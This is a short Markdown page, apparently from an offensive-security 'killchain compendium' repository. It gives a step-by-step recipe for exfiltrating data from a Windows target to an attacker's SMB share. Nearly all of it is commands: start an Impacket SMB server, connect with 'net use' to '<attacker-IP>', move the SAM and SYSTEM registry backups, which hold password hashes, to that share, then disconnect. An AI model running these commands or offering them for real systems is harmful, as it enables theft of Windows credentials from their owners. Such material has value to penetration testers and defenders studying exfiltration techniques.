killchain-compendium/exfiltration/windows/smb_connection.md

31 lines
557 B
Markdown
Raw Normal View History

2021-08-23 01:13:54 +02:00
# Connect to Attacker SMB
## Attacker
2022-09-03 16:24:01 +02:00
2021-08-23 01:13:54 +02:00
* Impacket smbserver on attacker
```sh
sudo examples/smbserver.py share . -smb2support -username <user> -password <password>
```
## Target
* Connect to attacker smb
```sh
net use \\<attacker-IP>\share /User:<user> <Password>
```
* Save data to attacker's smb
```sh
move sam.bak \\<attacker-IP>\share\sam.bak
move system.bak \\<attacker-IP>\share\system.bak
```
* Disconnect
```sh
net use \\<attacker-IP>\share /del
```
## Workarounds
* System Error 1312. User credentials need a domain
```sh
/USER:domain\user
```